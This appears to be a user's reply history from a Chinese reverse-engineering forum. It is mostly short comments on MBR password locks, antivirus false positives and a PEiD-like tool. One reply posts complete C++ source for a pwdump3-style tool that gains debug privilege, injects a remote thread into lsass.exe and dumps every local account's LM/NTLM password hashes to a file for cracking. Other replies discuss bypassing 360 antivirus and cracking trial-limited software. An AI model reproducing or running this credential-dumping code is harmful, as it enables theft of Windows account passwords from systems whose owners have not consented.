|
[原创]利用qq2010聊天信息获取,打造自己的远程控制
顶,没有森林我们就造个森林 |
|
[讨论]尾递归~
递归占用大量栈,还有就是速度慢 |
|
[原创]基于MBR的系统登录密码验证程序(附代码)
不是,debug命令写太累,汇编用masm编译器,程序自动替换MBR,将第一扇区移到第十扇区然后简单XOR,系统启动时必须输入正确密码,程序还替换了Int13部分中断,和Int1C中断,当时想写个硬盘写保护程序来的(那时用的win98),后来发现在DOS下可实现写保护,但win98下不行就没继续了...。想想那时还没耍女朋友,成天整这玩艺儿,一晃十来年了,只记得程序要两次重定位,失败计算机就不能启动,然后用软盘引导,导出MBR,用debug分析...真有精神呀 |
|
[原创]创建远程线程,将代码注入到其它进程中执行
那我也发个吧,仿pwdump3(反汇编)写的,导出登陆密码的hash,然后用LC4解出密码,被360偷偷上传后报毒了....代码有点长样 #include "stdafx.h" #include <stdlib.h> #include <stdio.h> #include <conio.h> #include <windows.h> #include <winnt.h> #include <tlhelp32.h> #include <ntsecapi.h> //////////////////////////////////////////////// typedef DWORD HUSER; typedef DWORD HSAM; typedef DWORD HDOMAIN; typedef DWORD HUSER; typedef struct _sam_user_info { DWORD rid; LSA_UNICODE_STRING name; } SAM_USER_INFO; typedef struct _sam_user_enum { DWORD count; SAM_USER_INFO *users; }SAM_USER_ENUM; #define SAM_USER_INFO_PASSWORD_OWFS 0x12 /////////////////////////////////////////////// //------------------------------------- // 全局函数 //自定义线程中使用的函数 //-----------samsrv.dll---------------- typedef NTSTATUS (WINAPI *MSamIConnect) (DWORD, HSAM*, DWORD, DWORD); typedef NTSTATUS (WINAPI *MSamrOpenDomain) (HSAM, DWORD dwAccess, PSID, HDOMAIN*); typedef NTSTATUS (WINAPI *MSamrOpenUser) (HDOMAIN, DWORD dwAccess, DWORD, HUSER*); typedef NTSTATUS (WINAPI *MSamrEnumerateUsersInDomain) (HDOMAIN, DWORD*, DWORD, SAM_USER_ENUM**, DWORD, PVOID); typedef NTSTATUS (WINAPI *MSamrQueryInformationUser) (HUSER, DWORD, PVOID); typedef HLOCAL (WINAPI *MSamIFree_SAMPR_USER_INFO_BUFFER) (PVOID, DWORD); typedef HLOCAL (WINAPI *MSamIFree_SAMPR_ENUMERATION_BUUFER) (SAM_USER_ENUM*); typedef NTSTATUS (WINAPI *MSamrCloseHandle) (DWORD*); //----------User32.dll----------------- typedef int (WINAPI *MwsprintfA)(LPTSTR,LPCTSTR,...);//定义wsprintf函数 typedef int (WINAPI *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);//定义MessageBox函数 //----------Kernel32.dll--------------- typedef int (WINAPI *MWideCharToMultiByte)(UINT,DWORD,LPCWSTR,int,LPSTR,int,LPCSTR,LPBOOL); typedef HANDLE (WINAPI *MCreateFileA)(LPCTSTR,DWORD,DWORD,LPSECURITY_ATTRIBUTES,DWORD,DWORD,HANDLE); typedef BOOL (WINAPI *MWriteFile)(HANDLE,LPCVOID,DWORD,LPDWORD,LPOVERLAPPED); typedef BOOL (WINAPI *MCloseHandle)(HANDLE); typedef DWORD (WINAPI *MGetLastError)(void); //----------Advapi32.dll--------------- typedef NTSTATUS (WINAPI *MLsaOpenPolicy)(IN PLSA_UNICODE_STRING,IN PLSA_OBJECT_ATTRIBUTES,IN ACCESS_MASK,IN OUT PLSA_HANDLE); typedef NTSTATUS (WINAPI *MLsaQueryInformationPolicy)(IN LSA_HANDLE,IN POLICY_INFORMATION_CLASS,OUT PVOID); typedef NTSTATUS (WINAPI *MLsaClose)(IN LSA_HANDLE); DWORD GetLsassPID(); LPSTR GetErrorCode(int code); void InjectThread(); //------------------------------------- //**************************** // // 传递线程参数 // //**************************** typedef struct ThreadParam { //变量定义 TCHAR FileName[256]; TCHAR UserIDFormat[256]; TCHAR temp[32]; TCHAR format[256]; TCHAR format1[2]; TCHAR format2[5]; TCHAR format3[256]; TCHAR Msg[MAX_PATH]; TCHAR szUserName[256]; HANDLE hFile; DWORD dwSize; unsigned char *hash; LSA_OBJECT_ATTRIBUTES attributes; PLSA_UNICODE_STRING pSysName; LSA_HANDLE hLsa; POLICY_ACCOUNT_DOMAIN_INFO* pDomainInfo; HSAM hSam; HDOMAIN hDomain; NTSTATUS enumRc; SAM_USER_ENUM *pEnum; HUSER hUser; unsigned hashData[8]; DWORD hsSize; PVOID pHashData; DWORD dwEnum; DWORD dwNumber; int i; TCHAR magic; unsigned j; unsigned carrybit; //User32.dll库函数指针 DWORD dwMessageBox; DWORD pwsprintfA; //Kernel32.dll库函数指针 DWORD pWideCharToMultiByte; DWORD pCreateFileA; DWORD pWriteFile; DWORD pCloseHandle; DWORD pGetLastError; //Advapi32.dll库函数指针 DWORD pLsaOpenPolicy; DWORD pLsaQueryInformationPolicy; DWORD pLsaClose; //Samsrv.dll库函数指针 DWORD pSamIConnect; DWORD pSamrOpenDomain; DWORD pSamrOpenUser; DWORD pSamrQueryInformationUser; DWORD pSamrEnumerateUsersInDomain; DWORD pSamIFree_SAMPR_USER_INFO_BUFFER; DWORD pSamIFree_SAMPR_ENUMERATION_BUFFER; DWORD pSamrCloseHandle; }ThreadParam; //********************************************* // 远程线程函数 //********************************************* DWORD __stdcall ThreadProc(ThreadParam *lp) { //定义函数名 MMessageBoxA _MessageBoxA; MwsprintfA _wsprintfA; MWideCharToMultiByte _WideCharToMultiByte; MCreateFileA _CreateFileA; MWriteFile _WriteFile; MCloseHandle _CloseHandle; MGetLastError _GetLastError; MLsaOpenPolicy _LsaOpenPolicy; MLsaQueryInformationPolicy _LsaQueryInformationPolicy; MLsaClose _LsaClose; MSamIConnect _SamIConnect; MSamrOpenDomain _SamrOpenDomain; MSamrOpenUser _SamrOpenUser; MSamrEnumerateUsersInDomain _SamrEnumerateUsersInDomain; MSamrQueryInformationUser _SamrQueryInformationUser; MSamIFree_SAMPR_USER_INFO_BUFFER _SamIFree_SAMPR_USER_INFO_BUFFER; MSamIFree_SAMPR_ENUMERATION_BUUFER _SamIFree_SAMPR_ENUMERATION_BUFFER; MSamrCloseHandle _SamrCloseHandle; //取函数入口地址 _MessageBoxA=(MMessageBoxA)lp->dwMessageBox; _wsprintfA=(MwsprintfA)lp->pwsprintfA; _WideCharToMultiByte=(MWideCharToMultiByte)lp->pWideCharToMultiByte; _CreateFileA=(MCreateFileA)lp->pCreateFileA; _WriteFile=(MWriteFile)lp->pWriteFile; _CloseHandle=(MCloseHandle)lp->pCloseHandle; _GetLastError=(MGetLastError)lp->pGetLastError; _LsaOpenPolicy=(MLsaOpenPolicy)lp->pLsaOpenPolicy; _LsaQueryInformationPolicy=(MLsaQueryInformationPolicy)lp->pLsaQueryInformationPolicy; _LsaClose=(MLsaClose)lp->pLsaClose; _SamIConnect=(MSamIConnect)lp->pSamIConnect; _SamrOpenDomain=(MSamrOpenDomain)lp->pSamrOpenDomain; _SamrOpenUser=(MSamrOpenUser)lp->pSamrOpenUser; _SamrEnumerateUsersInDomain=(MSamrEnumerateUsersInDomain)lp->pSamrEnumerateUsersInDomain; _SamrQueryInformationUser=(MSamrQueryInformationUser)lp->pSamrQueryInformationUser; _SamIFree_SAMPR_USER_INFO_BUFFER=(MSamIFree_SAMPR_USER_INFO_BUFFER)lp->pSamIFree_SAMPR_USER_INFO_BUFFER; _SamIFree_SAMPR_ENUMERATION_BUFFER=(MSamIFree_SAMPR_ENUMERATION_BUUFER)lp->pSamIFree_SAMPR_ENUMERATION_BUFFER; _SamrCloseHandle=(MSamrCloseHandle)lp->pSamrCloseHandle; lp->hFile=_CreateFileA(lp->FileName, 0xc0000000,//GENERIC_READ | GENERIC_WRITE 0, NULL, 0x02,//CREATE_ALWAYS 0x80,//FILE_ATTRIBUTE_NORMAL NULL); _LsaOpenPolicy(lp->pSysName, &lp->attributes, POLICY_ALL_ACCESS, &lp->hLsa); _LsaQueryInformationPolicy(lp->hLsa, PolicyAccountDomainInformation, (void **)&lp->pDomainInfo); _SamIConnect(0, &lp->hSam, MAXIMUM_ALLOWED, 1); _SamrOpenDomain(lp->hSam, 0xf07ff, lp->pDomainInfo->DomainSid, &lp->hDomain); do { lp->enumRc=_SamrEnumerateUsersInDomain(lp->hDomain,&lp->dwEnum,0,&lp->pEnum,1000,&lp->dwNumber); if(lp->enumRc==0||lp->enumRc==0x105) { for(lp->i=0;lp->i<(int)lp->dwNumber;lp->i++) { memset(lp->szUserName,0,sizeof(lp->szUserName)); // Open the user (by Rid) _SamrOpenUser(lp->hDomain, MAXIMUM_ALLOWED, lp->pEnum->users[lp->i].rid, &lp->hUser); // Get the password OWFs _SamrQueryInformationUser(lp->hUser, SAM_USER_INFO_PASSWORD_OWFS, &lp->pHashData); lp->hsSize=min(sizeof(lp->szUserName),lp->pEnum->users[lp->i].name.Length>>1); _WideCharToMultiByte(CP_ACP, 0, lp->pEnum->users[lp->i].name.Buffer, -1, lp->szUserName, lp->hsSize, NULL, NULL); //写用户名及ID号 _wsprintfA(lp->szUserName,lp->UserIDFormat,lp->szUserName,lp->pEnum->users[lp->i].rid); _WriteFile(lp->hFile,lp->szUserName,strlen(lp->szUserName),&lp->dwSize,NULL); // memcpy(lp->hashData, lp->pHashData,32); // for(lp->j=0;lp->j<32;lp->j++) // { // lp->carrybit=(lp->magic & 0x00000001) ? 0x80000000 : 0; // lp->hashData ^= lp->magic; // lp->magic >>= 1; // lp->magic |= lp->carrybit; // lp->hashData++; // } //写散列(转换为如BillG:1010:5ECD9236D21095CE7584248B8D2C9F9E:C04EB42B9F5B114C86921C4163AEB5B1:::模式) memset(lp->temp,0,sizeof(lp->temp)); lp->hash=(unsigned char *)lp->pHashData+16; _wsprintfA(lp->temp,lp->format3, lp->hash[0], lp->hash[1], lp->hash[2], lp->hash[3], lp->hash[4], lp->hash[5], lp->hash[6], lp->hash[7], lp->hash[8], lp->hash[9], lp->hash[10], lp->hash[11], lp->hash[12], lp->hash[13], lp->hash[14], lp->hash[15]); _WriteFile(lp->hFile,lp->temp,32,&lp->dwSize,NULL); _WriteFile(lp->hFile,lp->format1,1,&lp->dwSize,NULL);//写":" memset(lp->temp,0,sizeof(lp->temp)); lp->hash=(unsigned char *)lp->pHashData; _wsprintfA(lp->temp,lp->format3, lp->hash[0], lp->hash[1], lp->hash[2], lp->hash[3], lp->hash[4], lp->hash[5], lp->hash[6], lp->hash[7], lp->hash[8], lp->hash[9], lp->hash[10], lp->hash[11], lp->hash[12], lp->hash[13], lp->hash[14], lp->hash[15]); _WriteFile(lp->hFile,lp->temp,32,&lp->dwSize,NULL); _WriteFile(lp->hFile,lp->format2,sizeof(lp->format2),&lp->dwSize,NULL); _SamIFree_SAMPR_USER_INFO_BUFFER(lp->pHashData, SAM_USER_INFO_PASSWORD_OWFS); lp->pHashData=0; _SamrCloseHandle(&lp->hUser); lp->hUser=0; } _SamIFree_SAMPR_ENUMERATION_BUFFER(lp->pEnum); lp->pEnum=NULL; } }while(lp->enumRc==0x105); _SamrCloseHandle(&lp->hUser); _SamrCloseHandle(&lp->hDomain); _SamrCloseHandle(&lp->hSam); _LsaClose(lp->hLsa); _CloseHandle(lp->hFile); return 0; } //============================================= // // 提升进程权限 // hProcess [in] : 要提升的进程,目标进程 // lpPrivilegeName [in] : 要提升到的特权,目标特权 // 返回值 : TRUE : 成功; FALSE : 失败 // //============================================= BOOL UpdateProcessPrivilege(HANDLE hProcess,LPCTSTR lpPrivilegeName=SE_DEBUG_NAME) { HANDLE hToken; if(::OpenProcessToken(hProcess,TOKEN_ALL_ACCESS,&hToken)) { LUID destLuid; if(::LookupPrivilegeValue(NULL,lpPrivilegeName,&destLuid)) { TOKEN_PRIVILEGES TokenPrivileges; TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; TokenPrivileges.Privileges[0].Luid = destLuid; int iResult; if(iResult=::AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,0,NULL,NULL)) { return TRUE; } } } return FALSE; } //============================================= // 得到LSASS.EXE进程ID //失败返回:0 //成功返回:LSASS进程ID // //============================================= DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(hProcessSnap == INVALID_HANDLE_VALUE ) { printf("调用CreateToolhelp32Snapshot函数失败:%s\n",GetErrorCode(::GetLastError())); return 0; } pe32.dwSize = sizeof(PROCESSENTRY32); if(!Process32First(hProcessSnap, &pe32)) { CloseHandle(hProcessSnap); // Must clean up the snapshot object! return 0; } do { if(strcmpi(pe32.szExeFile,"LSASS.EXE")==0) { PID = pe32.th32ProcessID; printf("lsass.exe的PID:%d\n",PID); break; } }while(Process32Next( hProcessSnap, &pe32)); CloseHandle( hProcessSnap); return PID; } //============================================= // 获得错误代码具体内容 //成功返回:错误代码的消息内容 // //============================================= LPSTR GetErrorCode(int code) { int nErrorCode; TCHAR strErrorMessage[1024]; LPVOID lpMsgBuf; TCHAR buf[512]; lpMsgBuf=LocalLock(LocalAlloc(LMEM_MOVEABLE|LMEM_ZEROINIT,1000)); if(lpMsgBuf==NULL) { printf("内存分配失败!"); exit(1); } nErrorCode=code; SetLastError(nErrorCode); FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM| FORMAT_MESSAGE_IGNORE_INSERTS, NULL, GetLastError(), MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL); ::wsprintf(strErrorMessage,"%s",lpMsgBuf); // strErrorMessage=(LPCTSTR)lpMsgBuf; if(strErrorMessage=="") { printf("未知错误!"); } else { // msg=strErrorMessage; } LocalFree(lpMsgBuf); wsprintf(buf,"%s",strErrorMessage); return buf; } //============================================= // 全局函数 // 初始化远程线程参数 // //============================================= void InitThreadParam(ThreadParam *tp) { //结构清零 ::ZeroMemory(tp,sizeof(tp)); strcpy(tp->Msg,"你好!线程嵌入成功!\0"); strcpy(tp->format,"错误代码:%d 地址:%08X 地址:%08X\n"); strcpy(tp->UserIDFormat,"%s:%d:"); strcpy(tp->format1,":"); wsprintf(tp->format2,":::%c%c",0x0d,0x0a); strcpy(tp->format3,"%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X"); //取User32.dll函数 HINSTANCE hUser32=::LoadLibrary("user32.dll"); tp->pwsprintfA=(DWORD)::GetProcAddress(hUser32,"wsprintfA"); tp->dwMessageBox=(DWORD)::GetProcAddress(hUser32,"MessageBoxA"); //取Kernel32.dll函数 HINSTANCE hKernel32=::LoadLibrary("Kernel32.dll"); tp->pWideCharToMultiByte=(DWORD)::GetProcAddress(hKernel32,"WideCharToMultiByte"); tp->pCreateFileA=(DWORD)::GetProcAddress(hKernel32,"CreateFileA"); tp->pWriteFile=(DWORD)::GetProcAddress(hKernel32,"WriteFile"); tp->pCloseHandle=(DWORD)::GetProcAddress(hKernel32,"CloseHandle"); tp->pGetLastError=(DWORD)::GetProcAddress(hKernel32,"GetLastError"); //取Advapi32.dll函数 HINSTANCE hAdvapi32=::LoadLibrary("Advapi32.dll"); tp->pLsaOpenPolicy=(DWORD)::GetProcAddress(hAdvapi32,"LsaOpenPolicy"); tp->pLsaQueryInformationPolicy=(DWORD)::GetProcAddress(hAdvapi32,"LsaQueryInformationPolicy"); tp->pLsaClose=(DWORD)::GetProcAddress(hAdvapi32,"LsaClose"); //取Samsrv.dll函数 HINSTANCE hSamsrv; hSamsrv=LoadLibrary("samsrv.dll"); tp->pSamIConnect=(DWORD)GetProcAddress(hSamsrv,"SamIConnect"); tp->pSamrOpenDomain=(DWORD)GetProcAddress(hSamsrv,"SamrOpenDomain"); tp->pSamrOpenUser=(DWORD)GetProcAddress(hSamsrv,"SamrOpenUser"); tp->pSamrQueryInformationUser=(DWORD)GetProcAddress(hSamsrv,"SamrQueryInformationUser"); tp->pSamrEnumerateUsersInDomain=(DWORD)GetProcAddress(hSamsrv,"SamrEnumerateUsersInDomain"); tp->pSamIFree_SAMPR_USER_INFO_BUFFER=(DWORD)GetProcAddress(hSamsrv,"SamIFree_SAMPR_USER_INFO_BUFFER"); tp->pSamIFree_SAMPR_ENUMERATION_BUFFER=(DWORD)GetProcAddress(hSamsrv,"SamIFree_SAMPR_ENUMERATION_BUFFER"); tp->pSamrCloseHandle=(DWORD)GetProcAddress(hSamsrv,"SamrCloseHandle"); if(!tp->pSamIConnect || !tp->pSamrOpenDomain || !tp->pSamrOpenUser || !tp->pSamrQueryInformationUser || !tp->pSamrEnumerateUsersInDomain || !tp->pSamIFree_SAMPR_USER_INFO_BUFFER || !tp->pSamIFree_SAMPR_ENUMERATION_BUFFER || !tp->pSamrCloseHandle) { printf("获取samsrv.dll库函数失败:%s",GetErrorCode(GetLastError())); if(hSamsrv) FreeLibrary(hSamsrv); } //初始化变量 memset(&tp->attributes,0,sizeof(LSA_OBJECT_ATTRIBUTES)); tp->attributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES); //获取计算机名 TCHAR ComName[MAX_COMPUTERNAME_LENGTH+1]; DWORD dwSize=256; TCHAR Name[MAX_PATH]; TCHAR FileName[MAX_PATH]; BOOL Flag=true; GetCurrentDirectory(MAX_PATH,Name); //获取应用程序所在目录 GetModuleFileName(NULL,Name,MAX_PATH); GetComputerName(ComName,&dwSize); int i=strlen(Name); while(Flag) { i--; if(Name[i]=='\\') { Name[i+1]='\0'; Flag=false; } } wsprintf(FileName,"%s%s.txt",Name,ComName); printf("创建文件名:〖%s〗\n",FileName); strcpy(tp->FileName,FileName); tp->hash=NULL; tp->magic=NULL; tp->pHashData=0; tp->hUser=0; tp->i=0; tp->pEnum=NULL; tp->dwEnum=0; tp->hDomain=0; tp->hSam=0; tp->hFile=NULL; tp->pSysName=NULL; tp->hLsa=0; //释放库 if(hAdvapi32) FreeLibrary(hAdvapi32); if(hUser32) FreeLibrary(hUser32); if(hKernel32) FreeLibrary(hKernel32); if(hSamsrv) FreeLibrary(hSamsrv); return; } //============================================= //============================================= // 插入远程线程 //将函数体ThreadProc及其参数插入到LSASS进程中 // //============================================= void InjectThread() { //暂定线程体大小为4K const DWORD THREADSIZE=1024*10; HANDLE lsasshWnd=::OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,//无限制访问 FALSE, GetLsassPID()); //进程ID if(lsasshWnd==NULL) { printf("打开进程错%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } DWORD ReAddr = NULL; //为远程线程执行体分配内存 void * ThreadAddr=::VirtualAllocEx(lsasshWnd, 0, THREADSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); if(ThreadAddr==NULL) { printf("分配远程进程内存失败%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } printf("远程线程地址:%08X\n",ThreadAddr); //写线程执行体到远程进程 if(!::WriteProcessMemory(lsasshWnd,ThreadAddr,&ThreadProc,THREADSIZE,0)) { printf("写远程进程%08X错%d:%s\n",ThreadAddr,GetLastError(),GetErrorCode(GetLastError())); return; } //初始化线程参数 ThreadParam tp; //初始化参数函数 InitThreadParam(&tp); //将参数写进远程目标进程 ThreadParam *tpaddr=(ThreadParam *)::VirtualAllocEx(lsasshWnd, NULL, sizeof(ThreadParam), MEM_COMMIT, PAGE_READWRITE);//注意申请空间时的页面属性 if(tpaddr==NULL) { printf("分配指定进程内存参数错%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } if(!::WriteProcessMemory(lsasshWnd,tpaddr,&tp,sizeof(tp),0)) { printf("写远程进程参数错%d:%s\n",GetLastError(),GetErrorCode(GetLastError())); return; } //启动线程 printf("启动在LSASS.EXE进程中的远程线程....\n"); DWORD ThreadID; HANDLE hThread=::CreateRemoteThread(lsasshWnd, NULL, 0, (DWORD (__stdcall *)(void *))ThreadAddr, tpaddr, 0, &ThreadID); if(hThread==NULL) { //还有内存分配未释放 printf("启动远程线程错%d:%s\n",GetErrorCode(GetLastError())); return; } printf("等待远程线程返回....."); //等待远程线程结束 WaitForSingleObject(hThread,INFINITE); //释放调用进程内存 VirtualFreeEx(lsasshWnd, //HANDLE 0, // sizeof(tp), //SIZE MEM_DECOMMIT);//收回提交页面指定区域 VirtualFreeEx(hThread,//HANDLE 0, // THREADSIZE, //SIZE MEM_DECOMMIT);//收回提交页面指定区域 CloseHandle(hThread); CloseHandle(lsasshWnd); return; } int main(int argc, char* argv[]) { printf("\t\tCopyRight By lankerr 2007-09-14\n"); if(UpdateProcessPrivilege(::GetCurrentProcess(),SE_DEBUG_NAME)) printf("提升权限成功!\n"); //远程线程 InjectThread(); printf("\n程序执行完毕!\n"); return 0; } |
|
[讨论]360报毒
360还不经过同意上传写的文件,过两天这文件被报毒 |
|
[原创]基于MBR的系统登录密码验证程序(附代码)
我以前学汇编也写了个硬盘锁,和上面的差不多。不过在没实现外壳写入MBR |
|
[求助]如何破解通过文件获取使用次数和时间的软件?
这些可能是商用保护程序保护的,先找找是哪种商业软件保护。然后.... |
|
[求助]远程注入Lsass.exe失败的问题?
还真是360的原因,删除360就可以了。可惜装不起softice,不然可以看是在哪被过滤的. |
|
[原创]最近写了个仿PEiD的东西...
放个VC6的,识别为加壳 |
|
[求助]远程注入Lsass.exe失败的问题?
在explorer.exe中是成功的! |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值